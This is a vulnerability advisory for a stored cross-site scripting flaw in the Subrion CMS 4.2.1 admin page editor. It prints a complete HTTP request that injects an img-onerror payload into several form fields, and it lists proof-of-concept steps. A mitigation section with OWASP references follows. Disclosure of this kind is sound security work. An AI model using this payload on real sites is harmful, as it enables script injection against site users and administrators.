Title: ======= Subrion CMS 4.2.1 - Stored Cross-Site Scripting Introduction: ============== A content management system (CMS) is a computer application that supports the creation and modification of digital content. It is often used to support multiple users working in a collaborative environment. CMS features vary widely. Most CMSs include Web-based publishing, format management, history editing and version control, indexing, search, and retrieval. By their nature, content management systems support the separation of content and presentation. Vulnerability Disclosure: ========================== 2018-08-08: Public Disclosure CVE - ID: ========== N/A Affected Product(s): ===================== Subrion CMS 4.2.1 Exploitation Technique: ======================== Remote Severity Level: ================ High Technical Details & Description: ================================= Stored XSS occurs when a web application gathers input from a user which might be malicious, and thenstores that input in a data store for later use. The input that is stored is not correctly filtered. Request Method(s): [+] POST POST /_core/admin/pages/add/ HTTP/1.1 Host: demos.subrion.org User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://demos.subrion.org/_core/admin/pages/add/ Content-Type: application/x-www-form-urlencoded Content-Length: 635 Cookie: INTELLI_cdee4fe56a=4f86f0bde712293a36c4684b624a4c8d; INTELLI_cdee4fe56a=4f86f0bde712293a36c4684b624a4c8d; INTELLI_cdee4fe56a=4f86f0bde712293a36c4684b624a4c8d; INTELLI_cdee4fe56a=4f86f0bde712293a36c4684b624a4c8d; INTELLI_a1ef1b4b28=c9e89dadff3cdb2bc68cfa0d39de816c; _ga=GA1.2.183490498.1533768714; _gid=GA1.2.1557188799.1533768714; INTELLI_cdee4fe56a=4f86f0bde712293a36c4684b624a4c8d; loader=loaded; panelHidden=1 Connection: close Upgrade-Insecure-Requests: 1 __st=9fa0bf63a9d30c8bed9401cfbe572312&language=en&extras=&name=xsstored&parent_id=0&custom_url=&alias=xsstored&extension=%2F&unique=0&nofollow=0&new_window=0&passw=%3Cimg+src%3D%E2%80%9Dx%E2%80%9D+onerror%3Dalert%281%29%3E&home_page=0&custom_tpl=0&template_filename=&meta_description=%3Cimg+src%3D%E2%80%9Dx%E2%80%9D+onerror%3Dalert%281%29%3E&meta_keywords=%3Cimg+src%3D%E2%80%9Dx%E2%80%9D+onerror%3Dalert%281%29%3E&titles%5Ben%5D=%3Cimg+src%3D%E2%80%9Dx%E2%80%9D+onerror%3Dalert%281%29%3E&contents%5Ben%5D=%3Cp%3E%26lt%3Bimg+src%3D%26rdquo%3Bx%26rdquo%3B+onerror%3Dalert%281%29%26gt%3B%3C%2Fp%3E%0D%0A&status=active&save=Add&goto=list Vulnerable Directory(s): [+] /_core/admin/pages/add/ Vulnerable Parameter(s): [+] titles%5Ben%5D= Proof of Concept (PoC): ======================== Cross-Site Scripting, also known as XSS, is one of the most common attacks carried out in web applications. The concept of XSS is to manipulate the client-side scripts of a web application to perform actions planned by a malicious user. 1)Log in to the admin panel, click "content" 2)Pages>Add Page 3)Put the payload in "Title" 4)When you visit the page you've created, you'll always see the script [+] Solution ========= For a prevention of Cross Site Scripting, some measures should be considered: Never enter untrusted data except in locations defined for this purpose. The principle of this rule is to deny everything and mostly do not JavaScript code from an unknown source and then run it. Validate the escape characters before inserting them inside the HTML element. Failure to validate inputs may allow malicious code to be injected into the application. Validate URL parameters and check information that sends our HTTP requests, hex escapes us in URLs such as% 25, aawhere 25 is the ASCII code of the character "%". Avoid HTML injection attacks by resorting to libraries that parse the inserted HTML such as: HtmlSanitizer, OWASP Java HTML Sanitizer. Another recommendation to mitigate such security flaws in a web application is an application of a Web Application Firewall (WAF) such as ModSecurity, Ironbee and others. Credits ======== Offensive0Labs - Rafael Fontes Souza References ========== https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002) http://projects.webappsec.org/Cross-Site-Scripting http://cwe.mitre.org/data/definitions/79.html https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)